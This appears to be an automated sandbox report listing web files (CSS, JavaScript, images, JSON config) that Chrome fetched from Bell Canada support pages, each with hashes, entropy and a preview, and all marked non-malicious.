                                                                                                                                                                                                                                                                                                                                      URL:https://mybell-qc.akamaized.net/Styles/BRF2/Master/content/css/login-tracker.min.css?ver=202410310228
                                                                                                                                                                                                                                                                                                                                      Preview:@font-face{font-family:bellslim_font_black;src:url(https://mybell-qc.akamaized.net/Styles/BRF2/Master/core/fonts/bellslim_black-webfont.woff?ver=202408111738) format('woff'),url(https://mybell-qc.akamaized.net/Styles/BRF2/Master/core/fonts/bellslim_black-webfont.woff2?ver=202408111738) format('woff2');font-weight:400;font-style:normal;font-display:swap}.bellSlimBlackLT{font-family:bellslim_font_black,Helvetica,Arial,sans-serif;letter-spacing:-1px}@font-face{font-family:bellslim_mediumregular;src:url(https://mybell-qc.akamaized.net/Styles/BRF2/Master/core/fonts/bellslim_medium-webfont.eot?ver=201701151220);src:url(https://mybell-qc.akamaized.net/Styles/BRF2/Master/core/fonts/bellslim_medium-webfont.eot??ver=201701151220#iefix) format('embedded-opentype'),url(https://mybell-qc.akamaized.net/Styles/BRF2/Master/core/fonts/bellslim_medium-webfont.ttf?ver=201701151220) format('truetype'),url(https://mybell-qc.akamaized.net/Styles/BRF2/Master/core/fonts/bellslim_medium-webfont.svg?ver=2017011
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):6
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.584962500721156
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:kn:k
                                                                                                                                                                                                                                                                                                                                      MD5:8ECA36DE2DC5831816C1E7FDEFF2A66A
                                                                                                                                                                                                                                                                                                                                      SHA1:931AFB9F4647D495E1783623E25FC1CB93C9CB91
                                                                                                                                                                                                                                                                                                                                      SHA-256:A689579E15FCDB149AA4B8ADF80C1D26D097A8FA2FA17A2849E8191BDFF686F9
                                                                                                                                                                                                                                                                                                                                      SHA-512:ABE57F9E101635D338944DBE7C542AC18F80DDB1FD9A971BB4A1C22B7FAF7DCAAFC01CB9F6ACEDEBCF3B9C715DFDA44A0ED4E43F34D70A3819316356134484FF
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:FL(OA)
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):91
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.902793404502967
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiREpEyqXXl6EAeQ1CSHI:UrXiglqX17MRo
                                                                                                                                                                                                                                                                                                                                      MD5:ABEC128E96803A20D55C93E54FAD5458
                                                                                                                                                                                                                                                                                                                                      SHA1:E60C513C210F84533668558E6343B4BAC948E878
                                                                                                                                                                                                                                                                                                                                      SHA-256:910D0405D12EF4DD1354343212C91BE169D0769E2163EECD9A877C00AFA3E795
                                                                                                                                                                                                                                                                                                                                      SHA-512:284E2DC7C6A5D25020791EC4B7193715F442B3C6250156C063ED0FE79E57094FC79DD14568E227FB282961B9CF25D6466851A8CD65F66EC3B28E77237FCAB94A
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__0 === 'function' && branch_callback__0("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 40 x 100, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1423
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.7877511039669045
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:N2D3CC1VKBAbg3SY1zGcNMsfoVYFmkX2cEe/X1mY:NU1QBHSYkc6sf0+mkX25e/lmY
                                                                                                                                                                                                                                                                                                                                      MD5:2822D47A99B4380920EE42A64B03BD99
                                                                                                                                                                                                                                                                                                                                      SHA1:B2BC90E16162F5872D25E8284E844C898AEA84CE
                                                                                                                                                                                                                                                                                                                                      SHA-256:A48DBE9C7000DC6F17E9B10FA0E90A13744186FE6CAC738C82AC5BAF19920E21
                                                                                                                                                                                                                                                                                                                                      SHA-512:8418FD508F5F0CC84A830A9482A8CD40E40E007E58D68A31BF9223B0A32C0504BAC14A7ACC157F13A7DEE9CB8ACBEEA76B67F906C32A482B746095CF107928BC
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell-qc.akamaized.net/resource/web/DCX/css/sprites/icons_ie_deprecatedmessage.png?ver=201809301812
                                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...(...d......drz....tEXtSoftware.Adobe ImageReadyq.e<...1IDATx..[h.W...-..J5.`.6."..A.....H..............h.o./....Bk.Cq. h.E.*.C*.J.q.T.6D..E.&..........3.s....;.3.o...LB|e..H.&..d@...S..!..y...... k.*.`.....:.?.....`..U........8..+....`...V.f0..F....0Z... ....7p...c.k/....".v.d..r....gy.I...........{.i[.W=..Kl'.......4.&..(.R.G#.L.....Y^.2:.j0,*.....;K.d..5wH....J..nM....)X.S.N.^....Nw..........cXX.V#&5.Q.q...+.735lL.y..\.6..F.7..;...ff..d;wD..GXv5].;..v_........]..`....{...(...4!....{.J......L0..".P..]...W" ...t.Zn.E@P9..j$|?...aJ..Ld".9.....S.y.. ..x..)...aP..s{...W./...`7.Wx..$...[.<..f........L...Z.8..+...N...'.SC7...#2.E....t....N....E...~..E...=.M...._.`.a.7....ig.LA..bC~5i.....k8/y....O.....6,TK".V.F97.c...k....Y....-7/.5...m.....$.n...v.4...i....q..d..a.m.-g.6.%...t...$<.%....imeY.G.&3.xgs.z....8)...<f3.......Yx.Dr.....".e...`..E^...#.!.4...C.%...\J....yUxY.....^~.....^..]N.4-0..BA...&WL..@.rv.v"...,..#..I.uu...Y...N
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:C source, ASCII text, with very long lines (65098)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):218963
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.367074765150292
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3072:g6HK9hyNODcG1uoO2FiqGHGDmPhXUbzTBasyvLZ9+Mqy:NK9hykdDGHjXUvssyqy
                                                                                                                                                                                                                                                                                                                                      MD5:DFE5EC7350C655FA077DB5D93C98D025
                                                                                                                                                                                                                                                                                                                                      SHA1:D3407282E7F83ECBF135DE9E9A489A945D36B355
                                                                                                                                                                                                                                                                                                                                      SHA-256:AAA3677440F44DC9C11249CF6291644C13C1B0EEB7BA01325ED493178F7A10A6
                                                                                                                                                                                                                                                                                                                                      SHA-512:84D4A091A79544E4217C89EA501F19F09BE18E705507DB1B1A21CF392106AC68BBC88F071D9EA561D7AC1632FD438C340C6C78E2E6D954B80744B58E0C5636FD
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://s.go-mpulse.net/boomerang/ELNCJ-SNJ8G-MAJUF-JX27D-KEUXV
                                                                                                                                                                                                                                                                                                                                      Preview:/*. * Copyright (c) 2011, Yahoo! Inc. All rights reserved.. * Copyright (c) 2011-2012, Log-Normal, Inc. All rights reserved.. * Copyright (c) 2012-2017, SOASTA, Inc. All rights reserved.. * Copyright (c) 2017-2022, Akamai Technologies, Inc. All rights reserved.. * Copyrights licensed under the BSD License. See the accompanying LICENSE.txt file for terms.. */./* Boomerang Version: 1.792.0 e2ad31965b3add033aa3d32556a8d4f0cf9b8e56 */..BOOMR_start=(new Date).getTime();function BOOMR_check_doc_domain(e){if(window){if(!e){if(window.parent===window||!document.getElementById("boomr-if-as"))return;if(window.BOOMR&&BOOMR.boomerang_frame&&BOOMR.window)try{BOOMR.boomerang_frame.document.domain!==BOOMR.window.document.domain&&(BOOMR.boomerang_frame.document.domain=BOOMR.window.document.domain)}catch(t){BOOMR.isCrossOriginError(t)||BOOMR.addError(t,"BOOMR_check_doc_domain.domainFix")}e=document.domain}if(e&&-1!==e.indexOf(".")&&window.parent){try{window.parent.document;return}catch(t){try{document
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):91
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.912186294308169
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiREkP1yqXXl6ETPA1CSHI:UrXiH4qX1D8Ro
                                                                                                                                                                                                                                                                                                                                      MD5:BB6D670297407A15374798F67C2C0E18
                                                                                                                                                                                                                                                                                                                                      SHA1:9C2C404ADE62463F2A696CBE581F5A1078D029F7
                                                                                                                                                                                                                                                                                                                                      SHA-256:F396212119043D217589119E4207300DA92F250F23CA8383993734D907C38569
                                                                                                                                                                                                                                                                                                                                      SHA-512:74AF7B905C5011B995CA54369E8D99A21BCA549DCA02EFBC5F6097E1C64C9ED4F7BE374ADE65FCF39D7F9BD033F9EC435C5FA67897C6A5C426C0391D67063B21
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://app.link/_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__8
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__8 === 'function' && branch_callback__8("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):344209
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.203021640408325
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3072:v6FJyPC8OlTkcRA0YSThaoK5s9X2bDZ95DsnXi1jenWpMeZrRtRbOHQzT27R3xTO:v3CNO0LTharEI9uYjeaRskX
                                                                                                                                                                                                                                                                                                                                      MD5:613A909C38D3F6B6D2388AFCC1BD30FF
                                                                                                                                                                                                                                                                                                                                      SHA1:3E19B31C15CC53AE444400AD529C0AC5902345B5
                                                                                                                                                                                                                                                                                                                                      SHA-256:C653EBB37D3CBBB1807FCD727A0B8E8890973C0687295D4ABC2538F8D7833DF6
                                                                                                                                                                                                                                                                                                                                      SHA-512:1DA8D4966981B76A0111FF17BF096894B1FABD4C086F1DF66CF702B381FE7CD6E4BE03043329CCF1430DAA137D47B5AA99D352265D808CB545A8DC9308B35729
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://support.bell.ca/styles/media/core/js/brfcore-top.js?v=aH0RBr7WrwrJER3Bb_9epwsEyZS9t7XZ74sBrCfLAFI1
                                                                                                                                                                                                                                                                                                                                      Preview:!function(n,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=n.document?t(n,!0):function(n){if(!n.document)throw new Error("jQuery requires a window with a document");return t(n)}:t(n)}("undefined"!=typeof window?window:this,function(n,t){"use strict";function br(n,t,i){var r,e,u=(i=i||f).createElement("script");if(u.text=n,t)for(r in oe)(e=t[r]||t.getAttribute&&t.getAttribute(r))&&u.setAttribute(r,e);i.head.appendChild(u).parentNode.removeChild(u)}function ut(n){return null==n?n+"":"object"==typeof n||"function"==typeof n?ri[pr.call(n)]||"object":typeof n}function pi(n){var t=!!n&&"length"in n&&n.length,i=ut(n);return!u(n)&&!rt(n)&&("array"===i||0===t||"number"==typeof t&&0<t&&t-1 in n)}function c(n,t){return n.nodeName&&n.nodeName.toLowerCase()===t.toLowerCase()}function bi(n,t,r){return u(t)?i.grep(n,function(n,i){return!!t.call(n,i,n)!==r}):t.nodeType?i.grep(n,function(n){return n===t!==r}):"string"!=typeof t?i.grep(n,function(n){return-1<ii.c
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:gzip compressed data, was "build.min.js", last modified: Wed Apr 10 21:27:41 2024, from Unix, original size modulo 2^32 76432
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):23431
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.989595175333573
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:wqd7ldoHsoBpEGtKTtoUyrmhtwX0NclNN8oR8miptv0Em0670Wn7HKDfTX/4mRLR:37luTBBtaoUuXENcvN383pLmrv7Hu/4Q
                                                                                                                                                                                                                                                                                                                                      MD5:F4EC9657A3DC111D088E2ECA7B9796A4
                                                                                                                                                                                                                                                                                                                                      SHA1:09C35D743B3BEEA77182EDD32741C7FD8DA7C6F5
                                                                                                                                                                                                                                                                                                                                      SHA-256:26CE152A459AA437F10161A8D3AA8BDF3D7219F1E082896897EB96F305822EEA
                                                                                                                                                                                                                                                                                                                                      SHA-512:CE6A632376579C38CB4D7F095390E50D52AFB5C628A032A1C8A301A76A79D284C751B4908DDE0A3F8BDEA21DC6AED926BB709EFB7DE5E2A1D8ADABE09BF8D8E2
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:....M..f..build.min.js..y_..0.?.Bhr.4..&.,R...H.L..H23...Zl.l.X6K..g.....nI.f.9.y~.w...^.....j.?.G.4.[.q......M....tf..&..0....x..S6.6...l..+......o.(....^..gi?M...5a.i...W..X.`S.....A0..$Y...~M...'.t..O.I2..I.mJ...~2't".&.[,...Sv.N..,C....&....4..c...8<."..../S...m..b.....`.}......N.|m...0.V.2.......[..a.m....q.....M-..0h..s....`v.Z.}..Q.#.a*....}.f.A...!G...4.4v.S.en..8..0..h..]....d.....f.+...'..<..'..`>...a:.L.@.......z.[-...:.S.W..H....N.v.........<....1$..?.B+..p5......p5....."X..(....|..a...i:..i..pa/.0...1n:...8.M..0.F"G...Gh..3..0.|......l...kkV...[..c.....oo.4O...dVD........U........qD.... ......V.VD,.j{!~t...D..."..Fl8t.d2......8l:..`....\.>S..*.U,..;..zbprj....DP.VQ....+.@....j..8?M.31.....H...0..j..2!.bBN..9e.+....S....Y]...2..6.\.\}.[.....81.n...d.Oe....>..{......@...0k.\._...U...Y:.L..G.....N..........S.$|..N.y..5...._.4..@&$:..sK.. .M.5L...}......................rb.A..2.w...~>..i%.e...6....s..E.V.s...=.M.C..1.).?\..i..5.4.M..B
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 608x600, components 3
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):20083
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.760940004964403
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:4M8RBEAQY7wDF2IhbN5GkBaz6NZ7jBGO0TQ2XAbPmor+ekGYastNvyy:T8bEAQBo0T5Bo6NZXBoE2QiorlkGstND
                                                                                                                                                                                                                                                                                                                                      MD5:03F24A86AE99DA121DA749CE2F7CE28B
                                                                                                                                                                                                                                                                                                                                      SHA1:F7BC8686A2A6F8564312F5340BC8D96FEE1C4F42
                                                                                                                                                                                                                                                                                                                                      SHA-256:EEB96F117625E99CF0C59159FCC5BBFA54CBEEEBAD82EB7108144CFE571B51FE
                                                                                                                                                                                                                                                                                                                                      SHA-512:D9DF142ECF693565BBADFF04BF698C77CEE7160EA9BE11D3867DFE114B1DBAC1ED2ECF4BBE43BD510C51105F3976CACF7711A97A9B7F03D89BB4C5B354940AB7
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://support.bell.ca/Styles/media/support/Wireline/img/communityForumLeft-new.jpg
                                                                                                                                                                                                                                                                                                                                      Preview:......JFIF.............C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......X.`....................................................................................`..............................................................................................................................................................................................................................................@............................Vz...........................X..&.7......@..........................%p..{...._cmI.........................S]...=..W>....|.WM\s[MUs...}..........................V|...>./.........^f1..-.5...V.....eH.......................C..=}7..o=..>...k.ssT...[d.m...{k...T......................................s.>s...F0.....2...=.^..P.......................j..83..=]...Y.}..yU|.v\Z;[:.W..v..^d.......................)....Y..6..8e.._..\...._..|..'W.<{i..z....kP....................
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (397), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):2364
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.177085792445891
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:uRT8Q6pIsqI2EIpIm7RapIDqIfEIkIX7R0pIlqIxEICIdisJEJbJd:uOQzW2Nam7RT/fNtX7RdBxNTdBJEJbJd
                                                                                                                                                                                                                                                                                                                                      MD5:5D845F8B7EF931792FEEDB3948DFBD83
                                                                                                                                                                                                                                                                                                                                      SHA1:81873357CB0F16A061C684C484AB079803791CAE
                                                                                                                                                                                                                                                                                                                                      SHA-256:426FF01407FAA619999E5F6A6F425CE705DA070F6DC0EAAF6424C00620DD5962
                                                                                                                                                                                                                                                                                                                                      SHA-512:992AE74EC9E1667AD732C6F658B7EF86B4C2BA8642C215093E5EEB74C442697B20B5094D25AC756E32E5FD368F94C60A1A3E3C97216A09A41C493D692FF2FA86
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell-qc.akamaized.net/Resource/web/DCX/css/fonts.css?ver=202410310228
                                                                                                                                                                                                                                                                                                                                      Preview:/* DCX-Framework - All browsers fonts styles...Do not modify...Do not use this file to host styles for custom components...Contact Bell IT DCX - UI Solution Architect for support and updates */..../*Bell fonts*/..@font-face {.. font-family: 'bellslimregular';.. src: url('https://mybell-qc.akamaized.net/resource/web/css/font/bellslim_regular-webfont.eot?ver=201809301812');.. src: url('https://mybell-qc.akamaized.net/resource/web/css/font/bellslim_regular-webfont.eot??ver=201809301812') format('embedded-opentype'), url('https://mybell-qc.akamaized.net/resource/web/css/font/bellslim_regular-webfont.ttf?ver=201809301812') format('truetype'), url('https://mybell-qc.akamaized.net/resource/web/css/font/bellslim_regular-webfont.svg?ver=201809301812') format('svg');.. font-weight: normal;.. font-style: normal;..}..@font-face {.. font-family: 'bellslim_mediumregular';.. src: url('https://mybell-qc.akamaized.net/resource/web/css/font/bellslim_medium-webfont.eot?ver=2018093018
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 608x600, components 3
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):20083
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.760940004964403
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:4M8RBEAQY7wDF2IhbN5GkBaz6NZ7jBGO0TQ2XAbPmor+ekGYastNvyy:T8bEAQBo0T5Bo6NZXBoE2QiorlkGstND
                                                                                                                                                                                                                                                                                                                                      MD5:03F24A86AE99DA121DA749CE2F7CE28B
                                                                                                                                                                                                                                                                                                                                      SHA1:F7BC8686A2A6F8564312F5340BC8D96FEE1C4F42
                                                                                                                                                                                                                                                                                                                                      SHA-256:EEB96F117625E99CF0C59159FCC5BBFA54CBEEEBAD82EB7108144CFE571B51FE
                                                                                                                                                                                                                                                                                                                                      SHA-512:D9DF142ECF693565BBADFF04BF698C77CEE7160EA9BE11D3867DFE114B1DBAC1ED2ECF4BBE43BD510C51105F3976CACF7711A97A9B7F03D89BB4C5B354940AB7
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:......JFIF.............C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......X.`....................................................................................`..............................................................................................................................................................................................................................................@............................Vz...........................X..&.7......@..........................%p..{...._cmI.........................S]...=..W>....|.WM\s[MUs...}..........................V|...>./.........^f1..-.5...V.....eH.......................C..=}7..o=..>...k.ssT...[d.m...{k...T......................................s.>s...F0.....2...=.^..P.......................j..83..=]...Y.}..yU|.v\Z;[:.W..v..^d.......................)....Y..6..8e.._..\...._..|..'W.<{i..z....kP....................
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):24121
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.155639523401016
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:tmOlQLwOQtGUSq77TANO/9d47V6XzVoRFnVELEhIkLs9vNkbF:wO7OlM7L/9d45yzEntBbF
                                                                                                                                                                                                                                                                                                                                      MD5:43C287883FA883B31048653A25F5F75E
                                                                                                                                                                                                                                                                                                                                      SHA1:1B90A622AE9D295D50E8CC52669BBF93953BA3E2
                                                                                                                                                                                                                                                                                                                                      SHA-256:8E33D8AB848197533D33DB6C529EDE195E34D1022781772E34999277EF3AE740
                                                                                                                                                                                                                                                                                                                                      SHA-512:9FB9881EBD433100F3E3DB0B46B413E86AADB878C97762D40162A3EA892AC38A8F268028FB5BABA263A6D10CDE0AD23750644451F30AF6E00389C7A4C9EA0E6D
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:"https://c.go-mpulse.net/api/config.json?key=ELNCJ-SNJ8G-MAJUF-JX27D-KEUXV&d=support.bell.ca&t=5767934&v=1.792.0&if=&sl=0&si=f7d9a20d-383e-4051-aaa7-703e731b01ed-sm8207&plugins=AK,ConfigOverride,Continuity,PageParams,IFrameDelay,AutoXHR,SPA,History,Angular,Backbone,Ember,RT,CrossDomain,BW,PaintTiming,NavigationTiming,ResourceTiming,Memory,CACHE_RELOAD,Errors,TPAnalytics,UserTiming,Akamai,Early,EventTiming,BFCache,LOGN&acao=&ak.ai=811917"
                                                                                                                                                                                                                                                                                                                                      Preview:{"h.key":"ELNCJ-SNJ8G-MAJUF-JX27D-KEUXV","h.d":"bell.ca","h.t":1730380347056,"h.cr":"3bab7d6a17a688c2406e156da775ecbcf34af6c4-65f4033f-4680ccf8","session_id":"fd315dd2-1cfc-4781-9e37-543ec4003e92","site_domain":"bell.ca","beacon_url":"//02179915.akstat.io/","autorun":true,"beacon_interval":60,"BW":{"enabled":false},"RT":{"session_exp":1800},"ResourceTiming":{"enabled":true,"splitAtPath":true},"CrossDomain":{"sending":false,"cross_domain_url":""},"Errors":{"enabled":true,"monitorTimeout":true,"monitorEvents":true,"maxErrors":10,"sendAfterOnload":true,"sendInterval":1000},"Continuity":{"enabled":true},"PageParams":{"xhr":"none","pageGroups":[{"type":"Regexp","parameter1":"^http(s)?:\\/\\/www\\.bell\\.ca(\\/|\\/\\?prov=(qc|on)(\\&lang=(en|fr))?|/\\?lang(uage)?=(en|fr)(\\&prov=on)?)$","parameter2":"Home Page","on":["navigation"]},{"type":"Regexp","parameter1":"^http(?:s)?:\\/\\/www\\.bell\\.ca\\/mobilit(?:e|y)\\/produ(i|c)ts\\/iPhone-14","parameter2":"Mobility Product Details iPhone 14","o
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):322753
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.021061369447894
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:6144:u3xfJWvdFXxI/4YNNs8LdQMueMoKG5xSpnqdOReldsJ4iEW81SMIOlziV53tNjkG:+9Ldj5MsVdaBOiEW9MblAdjt
                                                                                                                                                                                                                                                                                                                                      MD5:6514121A0BAC89393DD58842B16ECFFF
                                                                                                                                                                                                                                                                                                                                      SHA1:0D2AF494456982D7EB7416E86323F893BD385FB7
                                                                                                                                                                                                                                                                                                                                      SHA-256:B1204CDEB3D94777DE86B0B9CDBE447023C448E17FE59CD92F006F4F4C79ECB4
                                                                                                                                                                                                                                                                                                                                      SHA-512:39340FADA09AA1C7931C0D1DDB401687F3585CD2961440727B3E19F64593A4108AB9F18AAEA0349E858856BA58A61CE424EF747268BF39B89542C8610FB02692
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:(function C(fb,fd,g,h){var fE=ReferenceError,fi=TypeError,fn=Object,fJ=RegExp,fr=Number,fK=String,fN=Array,fk=fn.bind,fG=fn.call,ft=fG.bind(fk,fG),O=fn.apply,fU=ft(O),s=[].push,P=[].pop,j=[].slice,M=[].splice,m=[].join,R=[].map,v=ft(s),N=ft(j),Z=ft(m),q=ft(R),U={}.hasOwnProperty,fC=ft(U),r=JSON.stringify,fo=fn.getOwnPropertyDescriptor,fI=fn.defineProperty,fF=fK.fromCharCode,w=typeof URL==="function"?URL.createObjectURL:null,fz=typeof Blob==="function"?Blob:null,fp=typeof Worker==="function"?Worker:null,Y=Math.min,fc=Math.floor,fa=fn.create,e="".indexOf,B="".charAt,ff=ft(e),fL=ft(B),fH=typeof Uint8Array==="function"?Uint8Array:fN;var fT=[fE,fi,fn,fJ,fr,fK,fN,fk,fG,O,s,P,j,M,m,R,U,r,fo,fI,fF,Y,fc,fa,e,B,fH];var n=["-9bATEvsF2EA4LNtzmYEE_a-OTMaX8GUrJk77R_IQ7YqXCqODwx2SlXnoEsQdoPUZnFQOWhJU9DCGp32jO6Y2vduAcWkQ2UpNyHnwD0G9dAUdU79ecpYlRG3pMo","XjpSpMgz4IC-eHbiHLTC-mEcodmcplcPbWDXNtU99C2IuskTsJCFhpQTUb8","BjI","W34c3rInsP0","QgY","all","lastIndexOf","SeCBCwStIiEP66VemF4LMZrAeGkf","E8ONQge1","8
